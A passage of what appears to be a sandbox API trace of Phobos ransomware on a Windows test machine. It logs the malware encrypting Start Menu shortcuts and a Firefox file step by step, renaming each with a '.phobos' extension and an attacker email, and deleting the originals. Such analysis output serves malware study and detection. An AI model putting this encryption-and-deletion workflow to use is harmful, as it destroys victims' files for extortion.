0x174 [0201.874] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.874] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.876] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.876] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.876] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ea, lpOverlapped=0x0) returned 1 [0201.935] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0201.935] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0201.936] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.936] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.936] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.936] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.936] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.936] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.936] CloseHandle (hObject=0x174) returned 1 [0201.936] CloseHandle (hObject=0xfc) returned 1 [0201.937] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk")) returned 1 [0201.938] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.939] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1250) returned 1 [0201.939] CloseHandle (hObject=0xfc) returned 1 [0201.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk")) returned 0x20 [0201.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.940] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.940] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.944] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.944] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.944] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4e2, lpOverlapped=0x0) returned 1 [0202.052] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0202.202] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0202.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0202.203] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.203] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0202.203] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.203] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0202.203] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.203] CloseHandle (hObject=0xfc) returned 1 [0202.203] CloseHandle (hObject=0x174) returned 1 [0202.204] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk")) returned 1 [0202.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.232] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1304) returned 1 [0202.232] CloseHandle (hObject=0x174) returned 1 [0202.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk")) returned 0x20 [0202.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.233] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.233] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0202.234] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.234] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x518, lpOverlapped=0x0) returned 1 [0202.276] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520, dwBufLen=0x520 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520) returned 1 [0202.277] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x520, lpOverlapped=0x0) returned 1 [0202.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0202.278] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.278] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0202.278] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.278] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0202.278] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.278] CloseHandle (hObject=0x174) returned 1 [0202.278] CloseHandle (hObject=0xfc) returned 1 [0202.278] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk")) returned 1 [0202.285] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.286] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1306) returned 1 [0202.286] CloseHandle (hObject=0xfc) returned 1 [0202.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk")) returned 0x20 [0202.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.286] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.286] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0202.288] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.288] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x51a, lpOverlapped=0x0) returned 1 [0202.341] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520, dwBufLen=0x520 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520) returned 1 [0202.341] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x520, lpOverlapped=0x0) returned 1 [0202.342] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0202.342] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.342] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0202.342] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.342] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0202.342] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.342] CloseHandle (hObject=0xfc) returned 1 [0202.342] CloseHandle (hObject=0x174) returned 1 [0202.342] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk")) returned 1 [0202.347] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.350] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=262) returned 1 [0202.351] CloseHandle (hObject=0x174) returned 1 [0202.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk")) returned 0x20 [0202.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.351] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.351] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.357] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0202.357] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.357] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x106, lpOverlapped=0x0) returned 1 [0202.357] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110, dwBufLen=0x110 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110) returned 1 [0202.358] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110, lpOverlapped=0x0) returned 1 [0202.358] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0202.358] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.358] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0202.358] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.358] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0202.359] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.359] CloseHandle (hObject=0x174) returned 1 [0202.359] CloseHandle (hObject=0x160) returned 1 [0202.359] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk")) returned 1 [0202.360] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.361] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10) returned 1 [0202.361] CloseHandle (hObject=0x160) returned 1 [0202.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332")) returned 0x2020 [0202.361] GetFileAttributesW 